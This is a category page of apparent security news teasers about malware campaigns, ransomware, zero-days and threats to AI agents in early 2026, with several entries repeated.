Geek-Guy.com

Category: malware

Stay ahead of cyber threats with the latest malware news, ransomware alerts, and virus analysis. Geek-Guy tracks emerging infections and removal trends.

AI, Cybersecurity, Endpoint, Global Security News, malware, Network Security, Risk Management

A new approach for GenAI risk protection

When generative AI (GenAI) hit the consumer market with the release of OpenAI’s ChatGPT, users worldwide flocked to the product and started experimenting with the tool’s capabilities across industries. The release also sent an instant panic through the hearts of information security professionals whose job is to protect organizations from risks, including the loss or…

Read more →

AI, Global Security News, malware, Russia

Keenadu backdoor found preinstalled on Android devices, powers Ad fraud campaign

Kaspersky uncovered Keenadu, an Android backdoor used for ad fraud that can even take full control of devices. Kaspersky has identified a new Android malware called Keenadu. It can be preinstalled in device firmware, hidden inside system apps, or even distributed via official stores like Google Play. Currently used for ad fraud by turning infected…

Read more →

AI, Exploits, Global Security News, malware

Tracking Malware Campaigns With Reused Material, (Wed, Feb 18th)

A few days ago I wrote a diary called “Malicious Script Delivering More Maliciousness”[1]. In the malware infection chain, there was a JPEG picture that embedded the last payload delimited with “BaseStart-” and “-BaseEnd” tags. Today, I discovered anoher campaign that relies exactly on the same technique. It started with an attachment called “TELERADIO_IB_OBYEKTLRIN_BURAXILIS_FORMASI.xIs” (SHA256:1bf3ec53ddd7399cdc1faf1f0796c5228adc438b6b7fa2513399cdc0cb865962).…

Read more →

AI, china, Exploits, Global Security News, malware

Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware

Notepad++ has released a security fix to plug gaps that were exploited by an advanced threat actor from China to hijack the software update mechanism to selectively deliver malware to targets of interest. The version 8.9.2 update incorporates what maintainer Don Ho calls a “double lock” design that aims to make the update process “robust…

Read more →

AI, APAC, Apps, china, Cybersecurity, Endpoint, Exploits, Global Security News, Government & Policy, malware, Network Security

Chinese hackers exploited a Dell zero-day for 18 months before anyone noticed

Researchers uncovered more worrying details about a long-running cyber espionage campaign suspected to be backed by the Chinese government, exemplifying how such attacks often go undetected until they’ve already caused significant damage. Google Threat Intelligence Group and Mandiant said the Chinese threat group UNC6201 has been exploiting a zero-day vulnerability in Dell RecoverPoint for Virtual…

Read more →

AI, china, Global Security News, malware, Network Security

SmartLoader hackers clone Oura MCP project to spread StealC malware

Hackers used a fake Oura MCP server to trick users into downloading malware that installs the StealC info-stealer. Straiker’s AI Research (STAR) Labs team uncovered a SmartLoader campaign in which attackers cloned a legitimate MCP server linked to Oura Health to spread the StealC information stealer. The fake project appeared credible, complete with bogus forks…

Read more →

AI, Apps, Data Breaches, Exploits, Global Security News, malware, Network Security, Risk Management

Infostealers Target OpenClaw AI Configuration Files

Infostealer malware is expanding beyond traditional browser and banking credential theft to target personal AI assistant environments. Researchers at Hudson Rock recently identified a live infection in which attackers exfiltrated a victim’s OpenClaw configuration files, including authentication tokens, cryptographic keys, and stored contextual data used by the AI agent. “While the malware may have been…

Read more →

AI, Cloud Security, Cybersecurity, Endpoint, Global Security News, malware, Network Security, Risk Management

Palo Alto Networks’ Koi acquisition is all about keeping AI agents in check

Palo Alto Networks announced Tuesday its plans to buy security startup Koi, a deal aimed at addressing the security risks emerging as organizations rapidly adopt agentic AI. Terms were not disclosed, but Israeli business outlet Globes reported that Palo Alto will pay approximately $400 million. The deal is another among a trend of larger cybersecurity…

Read more →

AI, Data Breaches, Global Security News, Government & Policy, malware, Network Security, Russia

Polish cybercrime Police arrest man linked to Phobos ransomware operation

Officers from Poland’s Central Bureau of Cybercrime Control (CBZC) police arrested a 47-year-old man linked to the Phobos ransomware operation. Polish authorities arrested a 47-year-old man suspected of involvement in cybercrime and linked him to the Phobos ransomware operation. Police said they discovered evidence of illegal activities on his seized devices. “Officers from the Central…

Read more →

AI, Global Security News, malware

Malwarebytes brings Scam Guard to desktop with real-time scam protection

Malwarebytes has expanded the availability of its scam detection tool Scam Guard to desktop for both Windows and Mac. The free scam protection tool provides real-time feedback on scams, threats and malware alongside digital safety recommendations. Scams have become a global crisis, draining $442 billion from consumers over the past year, according to GASA’s Global…

Read more →

AI, Global Security News, malware

Firmware-level Android backdoor found on tablets from multiple manufacturers

A new Android backdoor embedded directly in device firmware can quietly take control of apps and harvest data, Kaspersky researchers found. The malware, named Keenadu, was discovered during an investigation into earlier Android threats and appears to have been inserted during the firmware build process, not after devices reached users.  How the backdoor works…

Read more →

AI, Apps, Exploits, Global Security News, malware

ZeroDayRAT spyware targets Android and iOS devices via commercial toolkit

A new cross-platform spyware sold openly through Telegram is lowering the barrier for hackers seeking remote access to mobile devices. Called “ZeroDayRAT” by its developer, the toolkit is being marketed through Telegram channels as a ready-to-deploy remote access solution. iVerify researchers traced its first activity to 2nd February, with the spyware being distributed as an…

Read more →

AI, Data Breaches, Exploits, Global Security News, malware

South Korea slaps $25M fine on Dior, Louis Vuitton, Tiffany over Salesforce breach

South Korea fined Dior, Louis Vuitton, and Tiffany $25M after hackers breached their Salesforce systems, exposing customer data. South Korea’s Personal Information Protection Commission fined luxury brands including Dior, Louis Vuitton, and Tiffany & Co. a total of 36 billion Korean won ($25 million) after hackers compromised their Salesforce systems. The attack, linked to Scattered…

Read more →

AI, Cybersecurity, Endpoint, Global Security News, malware, Network Security, privacy, Risk Management

LATAM Businesses Hit by XWorm via Fake Financial Receipts: Full Campaign Analysis 

Malware campaigns targeting Latin America (LATAM) are evolving. While the final payloads, often commodity RATs like XWorm, remain consistent, delivery mechanisms are becoming increasingly sophisticated to bypass region-specific defenses and increase the chance of reaching real business users.  In this analysis, we dissect a recent campaign targeting Brazilian users. What starts as a deceptive “banking receipt” quickly turns into a multi-stage…

Read more →

AI, Cybersecurity, Exploits, Global Security News, malware, Risk Management

Hackers steal OpenClaw configuration in emerging AI agent threat

Researchers found an infostealer stole a victim’s OpenClaw configuration, marking a shift toward targeting personal AI agents. Cybersecurity researchers have uncovered a new information stealer that exfiltrated a victim’s OpenClaw configuration environment, previously known as Clawdbot and Moltbot. According to cybersecurity firm Hudson Rock, the case highlights a new shift in infostealer activity, moving beyond…

Read more →

AI, Global Security News, malware

REMnux v8 brings AI integration to the Linux malware analysis toolkit

REMnux, a specialized Linux distribution for malware analysis, has released version 8 with a rebuilt platform based on Ubuntu 24.04 and a new capability aimed at connecting AI agents directly to its toolset. REMnux is designed for analyzing malicious software, phishing artifacts, suspicious documents, and related forensic data. The project includes more than 200 preconfigured…

Read more →

AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, malware, Network Security, Risk Management

Fake Winter Olympics 2026 Stores Target Fans With Data-Theft Scams

As excitement builds at the Milano Cortina 2026 Winter Olympics, cybercriminals have launched convincing fake merchandise stores to steal payment details and personal data from eager fans.  The campaign focuses heavily on high-demand mascot items that are sold out on the official site. In the “… past week alone, we’ve identified nearly 20 lookalike domains…

Read more →

AI, Cloud Security, Data Breaches, Global Security News, malware, Risk Management

Was CISOs über OpenClaw wissen sollten

Lesen Sie, welches Sicherheitsrisiko die Verwendung von OpenClaw in Unternehmen mit sich bringt. ackpress – shutterstock.com Das neue Tool zur Orchestrierung persönlicher KI-Agenten namens OpenClaw – früher Clawdbot, dann Moltbot genannt – erfreut sich aktuell großer Beliebtheit. Die Open-Source-Software kann eigenständig und geräteübergreifend arbeiten, mit Online-Diensten interagieren und Workflows auslösen – kein Wunder, dass das…

Read more →

AI, Compliance, Endpoint, Exploits, Global Security News, malware, Risk Management

CVE-2026-2441: Google Patches Chrome Zero-Day Exploited in the Wild

Right after Apple’s CVE-2026-20700 zero-day under active exploitation made headlines, Google released security updates for Chrome to address the first actively exploited Chrome zero-day of 2026. CVE-2026-2441 Analysis The high-severity flaw, tracked as CVE-2026-2441, is a use-after-free vulnerability in Chrome’s CSS component. NIST’s NVD description notes that the issue could allow a remote attacker to…

Read more →

AI, Apps, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management

ClickFix Campaign Uses Fake CAPTCHA Pages to Deliver StealC Malware on Windows

A new social engineering campaign is abusing fake CAPTCHA verification pages to trick Windows users into launching StealC information-stealing malware.  The attack relies on compromised websites that display convincing Cloudflare-style security checks, prompting victims to manually execute malicious PowerShell commands under the guise of routine verification.  “StealC exfiltrates browser credentials, cryptocurrency wallets, Steam accounts, Outlook…

Read more →

AI, Global Security News, malware, Network Security

Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup

Microsoft warns of a new ClickFix variant that tricks users into running DNS commands to fetch malware via nslookup. Microsoft has revealed a new ClickFix variant that deceives users into running a malicious nslookup command through the Windows Run dialog to retrieve a second-stage payload via DNS. ClickFix typically uses fake CAPTCHA or error messages…

Read more →

AI, Apps, china, Compliance, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management, Venture

10 years later, Bangladesh Bank cyberheist still offers cyber-resiliency lessons

Ten years on, the Bangladesh Bank cyberheist — a landmark cybersecurity incident that rewrote the rules of nation state–sponsored hacking — continues to offer lessons for the cybersecurity community. Cyberspies hacked into Bangladesh Bank internal network and SWIFT (Society for Worldwide Interbank Financial Telecommunication) messaging environment before sending 35 fraudulent SWIFT payment instructions that attempted…

Read more →

AI, Cybersecurity, Global Security News, malware, Risk Management

Malicious npm and PyPI packages linked to Lazarus APT fake recruiter campaign

Researchers found malicious npm and PyPI packages tied to a fake recruitment campaign linked to North Korea’s Lazarus Group. ReversingLabs researcher uncovered new malicious packages on npm and PyPI connected to a fake job recruitment campaign attributed to the North Korea-linked Lazarus Group. The campaign uses deceptive hiring themes to trick developers into downloading infected…

Read more →

AI, Global Security News, malware, Russia

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 84

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Stan Ghouls targeting Russia and Uzbekistan with NetSupport RAT Breaking Down ZeroDayRAT – New Spyware Targeting Android and iOS Old-School IRC, New Victims: Inside the Newly Discovered SSHStalker Linux Botnet   Reynolds: Defense Evasion Capability…

Read more →

AI, china, Cybersecurity, Data Breaches, Endpoint, Europe, Exploits, Global Security News, malware, Russia

Security Affairs newsletter Round 563 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Fintech firm Figure disclosed data breach after employee phishing attack U.S. CISA adds a flaw in…

Read more →

AI, Apps, Global Security News, Government & Policy, malware, Russia

Suspected Russian hackers deploy CANFAIL malware against Ukraine

A new alleged Russia-linked APT group targeted Ukrainian defense, government, and energy groups, with CANFAIL malware. Google Threat Intelligence Group identified a previously undocumented threat actor behind attacks on Ukrainian organizations using CANFAIL malware. The group is possibly linked to Russian intelligence services and has targeted defense, military, government, and energy entities at both regional…

Read more →

AI, APAC, Exploits, Global Security News, malware, Network Security

New threat actor UAT-9921 deploys VoidLink against enterprise sectors

A new threat actor, UAT-9921, uses the modular VoidLink framework to target technology and financial organizations, Cisco Talos reports. Cisco Talos spotted a previously unknown threat actor, tracked as UAT-9921, using a new modular attack framework called VoidLink. The group targets organizations in the technology and financial services sectors. The flexible design of VoidLink suggests…

Read more →

AI, Apps, Data Breaches, Endpoint, Global Security News, malware, Network Security, Risk Management, Russia

Malicious Chrome Extensions Hijack 500,000 VK Accounts in Stealth Campaign

More than 500,000 VKontakte users had their accounts silently manipulated by Chrome extensions that appeared to offer simple interface customization.  Koi researchers found the extensions delivered multi-stage malware that forced group subscriptions, reset account settings, and interfered with VK’s security protections.  Because “… the extensions update automatically, the attacker can push new malicious code to…

Read more →

AI, Apps, Data Breaches, Endpoint, Exploits, Global Security News, Government & Policy, malware, Network Security

1,800+ Windows Servers Hit by BADIIS SEO Malware

More than 1,800 Windows servers have been quietly compromised in a sprawling malware campaign that turns legitimate websites into tools for search engine manipulation.  The operation leverages a sophisticated strain known as BADIIS to infect Microsoft Internet Information Services (IIS) environments, allowing threat actors to monetize trusted infrastructure without disrupting normal operations. We found “……

Read more →

AI, Data Breaches, Global Security News, malware, privacy

South Korea fines Louis Vuitton, Christian Dior, Tiffany $25M for SaaS security failures

South Korea’s data protection authority has handed down a combined KRW 36 billion (approximately US$25 million) in administrative fines to the local subsidiaries of three global luxury houses, after finding they failed to implement basic security controls while managing customer data through a SaaS platform. The Personal Information Protection Commission (PIPC), South Korea’s top privacy…

Read more →

AI, Global Security News, Government & Policy, malware, Russia

Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs

A previously undocumented threat actor has been attributed to attacks targeting Ukrainian organizations with malware known as CANFAIL. Google Threat Intelligence Group (GTIG) described the hack group as possibly affiliated with Russian intelligence services. The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and

Read more →

AI, Cybersecurity, Exploits, Global Security News, malware, Risk Management

Four new reasons why Windows LNK files cannot be trusted

The number of ways that Windows shortcut (.LNK) files can be abused just keeps growing: A cybersecurity researcher has documented four new techniques to trick Windows users into running malicious actions through innocent-looking shortcuts. Wietze Beukema demonstrated how to spoof the visible LNK destination, hide command-line arguments, and execute a different program than the one…

Read more →

AI, Cybersecurity, Exploits, Global Security News, malware, Risk Management

Four new reasons why Windows LNK files cannot be trusted

The number of ways that Windows shortcut (.LNK) files can be abused just keeps growing: A cybersecurity researcher has documented four new techniques to trick Windows users into running malicious actions through innocent-looking shortcuts. Wietze Beukema demonstrated how to spoof the visible LNK destination, hide command-line arguments, and execute a different program than the one…

Read more →

AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, Government & Policy, malware, Risk Management, Russia

Google fears massive attempt to clone Gemini AI through model extraction

Google detected and blocked a campaign involving more than 100,000 prompts that it claimed were designed to copy the proprietary reasoning capabilities of its Gemini AI model, according to a quarterly threat report released by Google Threat Intelligence Group. The prompts looked like a coordinated attempt to perform model extraction or distillation, a machine-learning process…

Read more →

AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, Government & Policy, malware, Risk Management, Russia

Google fears massive attempt to clone Gemini AI through model extraction

Google detected and blocked a campaign involving more than 100,000 prompts that it claimed were designed to copy the proprietary reasoning capabilities of its Gemini AI model, according to a quarterly threat report released by the company’s Threat Intelligence Group. The prompts looked like a coordinated attempt to perform model extraction or distillation, a machine-learning…

Read more →

AI, china, Cybersecurity, Data Breaches, Exploits, Global Security News, Government & Policy, malware, Risk Management, Russia

Google: state-backed hackers exploit Gemini AI for cyber recon and attacks

Google says nation-state actors used Gemini AI for reconnaissance and attack support in cyber operations. Google DeepMind and GTIG report a rise in model extraction or “distillation” attacks aimed at stealing AI intellectual property, which Google has detected and blocked. While APT groups have not breached frontier models, private firms and researchers have tried to…

Read more →

AI, APT, china, Cybersecurity, Global Security News, Government & Policy, malware, Russia, Technology

Google finds state-sponsored hackers use AI at ‘all stages’ of attack cycle 

A new report from Google found evidence that state-sponsored hacking groups have leveraged AI tool Gemini at nearly every stage of the cyber attack cycle. The research underscores how AI tools have matured in their cyber offensive capabilities, even as it doesn’t reveal novel or paradigm shifting uses of the technology. John Hultquist, chief analyst…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Threats

macOS Infostealers Fuel Growing Cybercrime Market

For years, some Mac users believed their devices were largely insulated from the malware plaguing Windows environments. That perception is rapidly eroding.  Flare researchers found a growing underground economy is now centered on macOS Infostealers — malware designed to extract browser credentials, Apple Keychain data, and cryptocurrency wallet seed phrases at scale. “I remember that…

Read more →

AI, Cybercrime, Europe, Exploits, Global Security News, hacking, hacking news, information security news, malware, Uncategorized

LummaStealer activity spikes post-law enforcement disruption

Bitdefender reports a surge in LummaStealer activity, showing the MaaS infostealer rebounded after 2025 law enforcement disruption. Bitdefender observed renewed LummaStealer activity, proving the MaaS infostealer recovered after 2025 takedowns. Active since 2022, it relies on affiliates, social engineering, fake cracked software, and fake CAPTCHA “ClickFix” lures. CastleLoader plays a key role in spreading it.…

Read more →

AI, Exploits, Global Security News, malware, Malware, Phishing, Security, Risk Management

Phishing campaign chains old Office flaw with fileless XWorm RAT to evade detection

Fortinet researchers have disclosed a new phishing campaign delivering the commercially available XWorm malware, chaining a years-old Microsoft Office vulnerability with fileless execution to escape detection. The campaign, which uses multi-themed phishing emails and a malicious Excel add-in, ultimately deploys the modular remote access trojan (RAT) capable of encrypted command-and control (C2) and plugin-based expansion.…

Read more →

AI, ANYRUN, Cybersecurity, Endpoint, Global Security News, malware, Risk Management

Fortune 500 Tech Enterprise Speeds up Triage and Response with ANY.RUN’s Solutions

In enterprise SaaS, unclear security decisions carry real cost. False positives disrupt customers, while missed threats expose the business.  A Fortune 500 cloud provider addressed this risk by embedding ANY.RUN into SOC investigations, giving analysts the behavioral evidence needed to reduce escalations, improve triage confidence, and make proportionate response decisions at scale.  Company Context and Security Scope  The organization is a…

Read more →

AI, CISO, Don't miss, features, Global Security News, Hot stuff, malware, News

When security decisions come too late, and attackers know it

In this Help Net Security, Chris O’Ferrell, CEO at CodeHunter, talks about why malware keeps succeeding, where attackers insert malicious code in the SDLC, and how CI/CD pipelines can become a quiet entry point. He also breaks down the difference between behavioral detection and behavioral intent analysis, and why explainable results matter for security teams.…

Read more →

AI, Apps, china, Cloud Security, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management

What CISOs need to know about the OpenClaw security nightmare

The new personal AI agent orchestration tool known as OpenClaw — formerly Clawdbot, then Moltbot — is a personal assistant that can do tasks for you without your personal supervision. It can operate across devices, interact with online services, trigger workflows — no wonder the Github repo has seen millions of visits and over 160,000…

Read more →

AI, Apps, Cybersecurity, Exploits, Global Security News, malware

Entwickler werden zum Angriffsvektor

Softwareentwickler sind gefragt – auch unter kriminellen Hackern. Gorodenkoff | shutterstock.com Statt einfach “nur” Fehler in Applikationen auszunutzen, entdecken kriminelle Hacker zunehmend die Tools und Zugriffskanäle für sich, auf die sich Softwareentwickler regelmäßig verlassen. Dabei kombinieren sie längst auch unterschiedliche Cybercrime-Taktiken und beziehen auch künstliche Intelligenz (KI) ein, um an ihr Ziel zu gelangen. “Angreifer…

Read more →

AI, Exploits, Global Security News, malware, Network Security

Four Seconds to Botnet – Analyzing a Self Propagating SSH Worm with Cryptographically Signed C2 [Guest Diary], (Wed, Feb 11th)

[This is a Guest Diary by Johnathan Husch, an ISC intern as part of the SANS.edu BACS program] Weak SSH passwords remain one of the most consistently exploited attack surfaces on the Internet. Even today, botnet operators continue to deploy credential stuffing malware that is capable of performing a full compromise of Linux systems in…

Read more →

AI, Apps, Cybersecurity, Exploits, Global Security News, malware, Network Security

SSHStalker botnet brute-forces its way onto 7,000 Linux machines

A newly discovered botnet is compromising poorly-protected Linux servers by brute-forcing weak SSH password login authentication. Researchers at Canada-based Flare Systems, who discovered the botnet, got into its staging server and believe at least 7,000 servers had been compromised by the end of January, half of them in the US. The botnet’s weapons include exploits…

Read more →

AI, Cybercrime, Endpoint, extortion, Global Security News, malware, Ransomware, Risk Management

0APT ransomware group rises swiftly with bluster, along with genuine threat of attack

Most signs suggest the group is running a massive hoax by claiming hundreds of initial victims, but at least some of the threat 0APT poses is grounded in truth backed by proven capabilities.

The post 0APT ransomware group rises swiftly with bluster, along with genuine threat of attack appeared first on CyberScoop.

Read more →

AI, Breaking News, cyber crime, Cybersecurity, Exploits, Global Security News, malware, Security

Reynolds ransomware uses BYOVD to disable security before encryption

Researchers discovered Reynolds ransomware, which uses BYOVD technique to disable security tools and evade detection before encryption. Researchers found a new ransomware, named Reynolds, that implements the Bring Your Own Vulnerable Driver (BYOVD) technique to disable security tools and evade detection before encrypting systems. Broadcom’s cybersecurity researchers initially attributed the attack to Black Basta due…

Read more →

AI, Global Security News, Government & Policy, malware

APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities

Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines.
The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT, which are often

Read more →

AI, Global Security News, Industry News, malware, Risk Management

CodeHunter expands behavioral intent analysis to secure the software supply chain

CodeHunter is expanding its behavioral intent technology beyond traditional malware analysis to address supply chain risk and security decision-making across the software development lifecycle (SDLC). According to a recent Gartner report, “software supply chains transcend organizational boundaries and consist of external entities in addition to internal systems.” Gartner also warns that “improper artifact integrity validation…

Read more →

AI, Cybersecurity, Global Security News, malware

WSL in the Malware Ecosystem, (Wed, Feb 11th)

WSL or “Windows Subsystem Linux”[1] is a feature in the Microsoft Windows ecosystem that allows users to run a real Linux environment directly inside Windows without needing a traditional virtual machine or dual boot setup. The latest version, WSL2, runs a lightweight virtualized Linux kernel for better compatibility and performance, making it especially useful for…

Read more →

AI, Endpoint Protection, MacOS Security, Malware, Security, Global Security News, malware, Network Security, Venture

North Korean actors blend ClickFix with new macOS backdoors in Crypto campaign

A financially motivated threat actor tracked as UNC1609 is using a ClickFix-style social engineering campaign to deploy multiple macOS malware families against crypto-focused organizations. According to new research from Google Cloud’s Mandiant, the activity recently targeted an employee at a company operating in the cryptocurrency and decentralized finance (DeFi) sector. The researchers said that the…

Read more →

AI, Breaking News, cyber crime, Cybercrime, Exploits, Global Security News, hacking, malware, Network Security

SSHStalker botnet targets Linux servers with legacy exploits and SSH scanning

A new Linux botnet, SSHStalker, has infected about 7,000 systems using old 2009-era exploits, IRC bots, and mass-scanning malware. Flare researchers uncovered a previously undocumented Linux botnet dubbed SSHStalker, observed via SSH honeypots over two months. Researchers ran an SSH honeypot with weak credentials starting in early 2026 and spotted a set of intrusions unlike…

Read more →

AI, ANYRUN, Compliance, Cybersecurity, Data Breaches, Endpoint, Global Security News, malware, Malware Analysis, malware behavior, Risk Management

Emerging Ransomware BQTLock & GREENBLOOD Disrupt Businesses in Minutes 

How long would it take your team to realize ransomware is already running?  The newly identified ransomware families are already causing real business disruption. These threats can disrupt operations fast while also reducing visibility through stealth or cleanup activity, shrinking the time teams have to detect and contain the attack.  Here’s what you should know about BQTLock and GREENBLOOD, and how your team can detect and contain them before…

Read more →

AI, Global Security News, malware

Vorgetäuschte PDFs bergen neue Gefahren

loading=”lazy” width=”400px”>Cyberkriminelle verschicken ihre Malware als PDF-Dateien getarnt. IDG Der Security-Anbieter Malwarebytes hat kürzlich vor einer besonders perfiden Phishing-Kampagne gewarnt. Die Angreifer tarnen dabei ihre Malware als gewöhnliches PDF-Dokument. Mitarbeiter sind es gewohnt, Bestellungen oder Rechnungen im PDF-Format zu erhalten. Daher ist es sehr wahrscheinlich, dass die schädlichen Dateien geöffnet werden. Klickt ein Mitarbeiter auf…

Read more →

AI, Endpoint, Exploits, Global Security News, malware, Microsoft, Security, Vendors and Providers, privacy, Risk Management

Microsoft to roll out a ‘consent first’ model to protect Windows

Windows serves as the backbone of enterprises around the world, powering more than a billion devices and supporting millions of apps. However Microsoft acknowledges that apps are increasingly going rogue, overriding settings, installing additional components, or altering critical Windows capabilities without user awareness or approval. In response, the tech giant plans to roll out what…

Read more →

AI, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management, Security, Vulnerabilities

February 2026 Patch Tuesday: Six new and actively exploited Microsoft vulnerabilities addressed

Microsoft highlighted six new and actively exploited vulnerabilities among the 60 fixes issued in today’s February Patch Tuesday releases. However, Tyler Reguly, associate director of security R&D at Fortra, says there’s good news: The issues are easy to resolve with regular Microsoft patches for Windows and Office, and none require any post patch configuration steps.…

Read more →

AI, Apps, Compliance, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management, Russia

Global Group ransomware gang running new campaign using Windows shortcut files

When Microsoft patched a vulnerability last summer that allowed threat actors to use Windows’ shortcut (.lnk) files in exploits, defenders might have hoped use of this tactic would decline. They were wrong. According to researchers at Forcepoint, a new high-volume phishing campaign spreading the Global Group ransomware has been detected that hopes to sucker employees…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

FortiSandbox XSS Vulnerability Allows Remote Command Execution

Fortinet has disclosed a vulnerability in its FortiSandbox platform that could allow unauthenticated attackers to execute arbitrary commands.  The issue involves a cross-site scripting (XSS) flaw in the FortiSandbox web interface that may lead to elevated access if exploited. The vulnerability “… may allow an unauthenticated attacker to execute commands via crafted requests,” said Fortinet…

Read more →

AI, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

Picus Red Report 2026 Shows Attackers Favor Stealth Over Disruption

Cyber attackers are quietly changing how they operate — and the latest Picus Red Report shows that disruption is no longer the goal.  Rather than encrypting systems or triggering immediate disruption, Picus Security found that adversaries are prioritizing stealth, persistence, and long-term access within enterprise environments.  “The 2026 Red Report confirms that the era of…

Read more →

AI, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Geopolitics, Global Security News, Government, Government & Policy, malware, Research, Russia

After major Poland energy grid cyberattack, CISA issues warning to U.S. audience

A recent attempt at a destructive cyberattack on Poland’s power grid has prompted the Cybersecurity and Infrastructure Security Agency to publish a warning for U.S. critical infrastructure owners and operators. Tuesday’s alert follows a Jan. 30 report from Poland’s Computer Emergency Response Team concluded the December attack overlapped significantly with infrastructure used by a Russian…

Read more →

AI, Apps, Cloud Security, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

Bing Ads Abused to Deliver Azure-Hosted Tech Support Scams

A recently identified scam campaign is using Bing search advertisements and Microsoft Azure infrastructure to redirect users to fraudulent tech support pages, demonstrating how legitimate platforms can be misused for social engineering activity.  “The tech support scam campaign had a significant initial impact, affecting users across 48 different organizations in the U.S. within a short…

Read more →

AI, Android, Breaking News, cyber crime, Exploits, Global Security News, malware, Mobile

ZeroDayRAT spyware grants attackers total access to mobile devices

ZeroDayRAT is a commercial mobile spyware that grants full remote access to Android and iOS devices for spying and data theft. ZeroDayRAT is a newly discovered commercial mobile spyware toolkit that gives attackers full control over Android and iOS devices. It supports live camera access, keylogging, and theft of banking and crypto data. First spotted…

Read more →

AI, Global Security News, malware, Malwarebytes, News, Proxy, YouTube

Trojanized 7-Zip downloads turn home computers into proxy nodes

A trojanized version of the popular 7-Zip software is quietly turning home computers into residential proxy nodes, Malwarebytes warns. Spurred by a Reddit post in which a user complained about getting infected with malware after downloading 7-Zip from 7zip[.]com instead of the legitimate 7-zip.org, Malwarebytes researchers looked into the matter and found that the malicious…

Read more →

AI, ANYRUN, Cybersecurity, Cybersecurity Lifehacks, Global Security News, malware, malware behavior, Network Security, Risk Management

How to Build Threat Hunting that Defends Your Organization Against Real Attacks

Threat hunting is widely recognized as one of the most important capabilities of a mature SOC. It uncovers stealthy attackers early, reduces dwell time, and prevents security incidents from impacting the business. Yet, in practice, many organizations find that their threat hunting efforts don’t consistently deliver these outcomes.  Let’s take a look at how high-performing security teams make threat hunting more repeatable, measurable, and effective.  Why Threat Hunting Programs Often Fail Before They Start …

Read more →

AI, Cybercrime, Malware, Ransomware, Security, Endpoint, Exploits, Global Security News, malware, Network Security

Windows shortcut weaponized in Phorpiex-linked ransomware campaign

Forcepoint X-Labs researchers have identified a large Phorpiex botnet-aided phishing campaign that uses weaponized Windows shortcut files to deploy Global Group ransomware across victim systems. The campaign, observed in late 2024 and continuing into 2026, leverages a common email lure, with the subject “Your Document”, to trick recipients into opening a malicious LNK attachment. “By…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats

European Commission Hit by Mobile Management Data Breach

European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data.  The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it.  “The EU commission did well to clean systems swiftly and ensure…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats

European Commission Hit by Mobile Management Data Breach

European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data.  The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it.  “The EU commission did well to clean systems swiftly and ensure…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats

European Commission Hit by Mobile Management Data Breach

European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data.  The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it.  “The EU commission did well to clean systems swiftly and ensure…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats

European Commission Hit by Mobile Management Data Breach

European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data.  The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it.  “The EU commission did well to clean systems swiftly and ensure…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats

European Commission Hit by Mobile Management Data Breach

European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data.  The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it.  “The EU commission did well to clean systems swiftly and ensure…

Read more →

AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats

European Commission Hit by Mobile Management Data Breach

European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data.  The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it.  “The EU commission did well to clean systems swiftly and ensure…

